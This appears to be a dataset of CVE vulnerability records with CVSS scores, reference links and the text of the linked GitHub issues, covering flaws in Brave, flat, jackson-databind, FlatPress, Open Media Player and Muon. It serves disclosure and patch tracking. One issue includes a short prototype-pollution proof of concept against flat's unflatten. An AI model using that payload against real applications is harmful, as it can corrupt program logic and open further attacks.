"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-browser/issues/24378"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-core/commit/7ef8cb2f232abdf59ec9c3c99a086a14b972bc56"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/brave/brave-core/pull/13989"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://hackerone.com/reports/1610343"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:brave:brave:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FE993CC2-7343-4D41-ABF4-84B6DC15763F",
"versionEndExcluding": "1.42.51",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"755"
] | 755 | https://github.com/brave/brave-browser/issues/24378 | [
"Issue Tracking",
"Release Notes",
"Third Party Advisory"
] | github.com | [
"brave",
"brave-browser"
] | ### Release Notes
- Upgrade from Chromium 104.0.5112.69 to Chromium 104.0.5112.81. ([#24364](https://github.com/brave/brave-browser/issues/24364))
- Farbled HTTP Accept-Language header does not have a q value. ([#24126](https://github.com/brave/brave-browser/issues/24126))
- Remove `Get image description from Brave` context menu option. ([#24047](https://github.com/brave/brave-browser/issues/24047))
- Browser crashes in SolanaProviderImpl::SelectedAccountChanged when trying to remove selected Ledger Solana account . ([#24046](https://github.com/brave/brave-browser/issues/24046))
- Extraneous data in eth_call response is not handled correctly. ([#23998](https://github.com/brave/brave-browser/issues/23998))
- [hackerone] wallet API freezing issue. ([#23973](https://github.com/brave/brave-browser/issues/23973))
- Errors listing NFTs on OpenSea. ([#23889](https://github.com/brave/brave-browser/issues/23889))
- Support using ledger hardware for Solana signTransaction, signAllTransactions provider APIs. ([#23842](https://github.com/brave/brave-browser/issues/23842))
- Broken Image for Solana on localhost. ([#23821](https://github.com/brave/brave-browser/issues/23821))
- Update search engine defaults for AT / ES / MX . ([#23814](https://github.com/brave/brave-browser/issues/23814))
- Set macOS minimum version to 10.13 for 1.42.x in Sparkle. ([#23748](https://github.com/brave/brave-browser/issues/23748))
- Add custom asset page not loading. ([#23694](https://github.com/brave/brave-browser/issues/23694))
- [hackerone] IPFS crash. ([#23646](https://github.com/brave/brave-browser/issues/23646))
- Add Loading Skeletons to Wallet Panel. ([#23577](https://github.com/brave/brave-browser/issues/23577))
- [hackerone] Add warning that local ipfs node will bypass browser proxy. ([#23570](https://github.com/brave/brave-browser/issues/23570))
- NEAR integration (Aurora). ([#23522](https://github.com/brave/brave-browser/issues/23522))
- Pinned tabs, when muted, can't always be unmuted by clicking on unmute icon. ([#23476](https://github.com/brave/brave-browser/issues/23476))
- Remove v1 shields UI (a.k.a. shields extension panel). ([#23285](https://github.com/brave/brave-browser/issues/23285))
- Enable 1PES by default. ([#23180](https://github.com/brave/brave-browser/issues/23180))
- Remove P3A protobuf reporting. ([#23147](https://github.com/brave/brave-browser/issues/23147))
- Add ability to debounce URLs based on a regex applied to the path. ([#23121](https://github.com/brave/brave-browser/issues/23121))
- Add setting to allow separate search engine usage for Private Window. ([#23091](https://github.com/brave/brave-browser/issues/23091))
- Add new setting to show/hide bookmarks and history from the address bar autocomplete results . ([#22948](https://github.com/brave/brave-browser/issues/22948))
- Wallet should use the user locale when displaying currency symbols. ([#22815](https://github.com/brave/brave-browser/issues/22815))
- Fix cosmetic filters not being applied inside of child frames. ([#22781](https://github.com/brave/brave-browser/issues/22781))
- Add localisation for tab-titles on add-switch chain dapps panel. ([#22672](https://github.com/brave/brave-browser/issues/22672))
- Evmos actions failing (such as voting). ([#22650](https://github.com/brave/brave-browser/issues/22650))
- Add link to support page within wallet. ([#22598](https://github.com/brave/brave-browser/issues/22598))
- Refresh design for NTP Private Window. ([#22566](https://github.com/brave/brave-browser/issues/22566))
- Bright flash of light upon opening a new tab. ([#16078](https://github.com/brave/brave-browser/issues/16078))
- Add list of well known chains to the local data files updater. ([#14574](https://github.com/brave/brave-browser/issues/14574))
- Import from Chromium version of Microsoft Edge. ([#13334](https://github.com/brave/brave-browser/issues/13334))
- Filter out Marketo's email tracker from URLs. ([#9018](https://github.com/brave/brave-browser/issues/9018))
- Delete icon in cookie settings does not delete some entries set from Shields or other settings. ([#8604](https://github.com/brave/brave-browser/issues/8604))
| Desktop Release Notes for 1.42.x - Release | https://api.github.com/repos/brave/brave-browser/issues/24378/comments | 0 | 2022-08-02T15:46:17Z | 2022-08-03T14:31:27Z | https://github.com/brave/brave-browser/issues/24378 | 1,326,049,924 | 24,378 | 4,543 |
CVE-2020-36632 | 2022-12-25T20:15:25.287 | A vulnerability, which was classified as critical, was found in hughsk flat up to 5.0.0. This affects the function unflatten of the file index.js. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). It is possible to initiate the attack remotely. Upgrading to version 5.0.1 is able to address this issue. The name of the patch is 20ef0ef55dfa028caddaedbcb33efbdb04d18e13. It is recommended to upgrade the affected component. The identifier VDB-216777 was assigned to this vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/hughsk/flat/commit/20ef0ef55dfa028caddaedbcb33efbdb04d18e13"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/hughsk/flat/issues/105"
},
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/hughsk/flat/pull/106"
},
{
"source": "cna@vuldb.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/hughsk/flat/releases/tag/5.0.1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.216777"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216777"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/hughsk/flat/commit/20ef0ef55dfa028caddaedbcb33efbdb04d18e13"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/hughsk/flat/issues/105"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/hughsk/flat/pull/106"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/hughsk/flat/releases/tag/5.0.1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.216777"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216777"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:flat_project:flat:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A3F489C3-86F4-4674-B083-0722383EE1FC",
"versionEndExcluding": "5.0.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1321"
] | 1321 | https://github.com/hughsk/flat/issues/105 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"hughsk",
"flat"
] | This module has prototype pollution vulnerablity
and it can make logic vulnerability in application use this
```js
var unflatten = require('flat').unflatten;
unflatten({
'__proto__.polluted': true
});
console.log(polluted); // true
``` | Prototype Pollution | https://api.github.com/repos/hughsk/flat/issues/105/comments | 1 | 2020-07-18T15:44:44Z | 2021-01-28T02:48:35Z | https://github.com/hughsk/flat/issues/105 | 660,219,990 | 105 | 4,544 |
CVE-2020-10650 | 2022-12-26T20:15:10.433 | A deserialization flaw was discovered in jackson-databind through 2.9.10.4. It could allow an unauthenticated user to perform code execution via ignite-jta or quartz-core: org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup, org.apache.ignite.cache.jta.jndi.CacheJndiTmFactory, and org.quartz.utils.JNDIConnectionProvider. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-databind/commit/a424c038ba0c0d65e579e22001dec925902ac0ef"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-databind/issues/2658"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/advisories/GHSA-rpr3-cw39-3pxh"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00032.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://security.netapp.com/advisory/ntap-20230818-0007/"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-databind/commit/a424c038ba0c0d65e579e22001dec925902ac0ef"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-databind/issues/2658"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/advisories/GHSA-rpr3-cw39-3pxh"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00032.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://security.netapp.com/advisory/ntap-20230818-0007/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2022.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "238F4D80-C84C-4C96-B45D-D73ADE46A3C8",
"versionEndExcluding": null,
"versionEndIncluding": "2.9.10.4",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "792DF04A-2D1B-40B5-B960-3E7152732EB8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*",
"matchCriteriaId": "7DA6E92C-AC3B-40CF-96AE-22CD8769886F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"502"
] | 502 | https://github.com/FasterXML/jackson-databind/issues/2658 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"FasterXML",
"jackson-databind"
] | Another gadget type reported regarding a class of `ignite-jta`.
See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem.
Mitre id: CVE-2020-10650
Reporter: Srikanth Ramu, threedr3am'follower (2 concurrent reports)
Fix will be included in:
* 2.9.10.4
* Does not affect 2.10.0 and later
| Block one more gadget type (ignite-jta, CVE-2020-10650) | https://api.github.com/repos/FasterXML/jackson-databind/issues/2658/comments | 0 | 2020-03-15T23:59:21Z | 2020-03-18T22:57:39Z | https://github.com/FasterXML/jackson-databind/issues/2658 | 581,881,392 | 2,658 | 4,545 |
CVE-2019-25086 | 2022-12-27T09:15:09.647 | A vulnerability was found in IET-OU Open Media Player up to 1.5.0. It has been declared as problematic. This vulnerability affects the function webvtt of the file application/controllers/timedtext.php. The manipulation of the argument ttml_url leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.5.1 is able to address this issue. The name of the patch is 3f39f2d68d11895929c04f7b49b97a734ae7cd1f. It is recommended to upgrade the affected component. VDB-216862 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/IET-OU/open-media-player/commit/3f39f2d68d11895929c04f7b49b97a734ae7cd1f"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/IET-OU/open-media-player/issues/93"
},
{
"source": "cna@vuldb.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/IET-OU/open-media-player/releases/tag/1.5.1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking",
"Permissions Required",
"Vendor Advisory"
],
"url": "https://iet.eu.teamwork.com/desk/#/tickets/366419"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.216862"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216862"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/IET-OU/open-media-player/commit/3f39f2d68d11895929c04f7b49b97a734ae7cd1f"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/IET-OU/open-media-player/issues/93"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/IET-OU/open-media-player/releases/tag/1.5.1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Permissions Required",
"Vendor Advisory"
],
"url": "https://iet.eu.teamwork.com/desk/#/tickets/366419"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.216862"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216862"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:open:open_media_player:*:*:*:*:*:*:*:*",
"matchCriteriaId": "623D5E25-2312-4590-B717-18C6E666BE5D",
"versionEndExcluding": "1.5.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/IET-OU/open-media-player/issues/93 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"IET-OU",
"open-media-player"
] | Fix for XSS vulnerability in `Timedtext` PHP controller.
See commit below ...
* Also see :~ https://iet.eu.teamwork.com/desk/#/tickets/366419 (_login required_)
--- | Security: `timedtext` controller | https://api.github.com/repos/IET-OU/open-media-player/issues/93/comments | 0 | 2019-07-12T11:44:20Z | 2019-07-12T12:42:01Z | https://github.com/IET-OU/open-media-player/issues/93 | 467,370,418 | 93 | 4,546 |
CVE-2022-4748 | 2022-12-27T09:15:09.877 | A vulnerability was found in FlatPress. It has been classified as critical. This affects the function doItemActions of the file fp-plugins/mediamanager/panels/panel.mediamanager.file.php of the component File Delete Handler. The manipulation of the argument deletefile leads to path traversal. The name of the patch is 5d5c7f6d8f072d14926fc2c3a97cdd763802f170. It is recommended to apply a patch to fix this issue. The identifier VDB-216861 was assigned to this vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/commit/5d5c7f6d8f072d14926fc2c3a97cdd763802f170"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/issues/179"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.216861"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216861"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/commit/5d5c7f6d8f072d14926fc2c3a97cdd763802f170"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/issues/179"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.216861"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216861"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:flatpress:flatpress:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CD0F1B05-3B1E-4527-9AE3-488578A1ADCE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/flatpressblog/flatpress/issues/179 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"flatpressblog",
"flatpress"
] | Deleting a file might be used to break out of the attachs/images/gallery folder. | Possible path traversal in file deletion | https://api.github.com/repos/flatpressblog/flatpress/issues/179/comments | 0 | 2022-12-25T13:57:15Z | 2022-12-25T14:00:10Z | https://github.com/flatpressblog/flatpress/issues/179 | 1,510,334,186 | 179 | 4,547 |
CVE-2022-4755 | 2022-12-27T10:15:11.850 | A vulnerability was found in FlatPress and classified as problematic. This issue affects the function main of the file fp-plugins/mediamanager/panels/panel.mediamanager.file.php of the component Media Manager Plugin. The manipulation of the argument mm-newgallery-name leads to cross site scripting. The attack may be initiated remotely. The name of the patch is d3f329496536dc99f9707f2f295d571d65a496f5. It is recommended to apply a patch to fix this issue. The identifier VDB-216869 was assigned to this vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/commit/d3f329496536dc99f9707f2f295d571d65a496f5"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/issues/177"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.216869"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216869"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/commit/d3f329496536dc99f9707f2f295d571d65a496f5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/issues/177"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.216869"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216869"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:flatpress:flatpress:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CD0F1B05-3B1E-4527-9AE3-488578A1ADCE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/flatpressblog/flatpress/issues/177 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"flatpressblog",
"flatpress"
] | Media Manager plugin allows for possible XSS due to unsufficient input sanitation. (Details follow.) | Possible XSS in Media Manager plugin | https://api.github.com/repos/flatpressblog/flatpress/issues/177/comments | 0 | 2022-12-25T13:27:46Z | 2022-12-25T13:32:12Z | https://github.com/flatpressblog/flatpress/issues/177 | 1,510,328,679 | 177 | 4,548 |
CVE-2019-25089 | 2022-12-27T12:15:10.837 | A vulnerability has been found in Morgawr Muon 0.1.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file src/muon/handler.clj. The manipulation leads to insufficiently random values. The attack can be launched remotely. Upgrading to version 0.2.0-indev is able to address this issue. The name of the patch is c09ed972c020f759110c707b06ca2644f0bacd7f. It is recommended to upgrade the affected component. The identifier VDB-216877 was assigned to this vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.1,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Morgawr/Muon/commit/c09ed972c020f759110c707b06ca2644f0bacd7f"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Morgawr/Muon/issues/4"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.216877"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216877"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Morgawr/Muon/commit/c09ed972c020f759110c707b06ca2644f0bacd7f"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
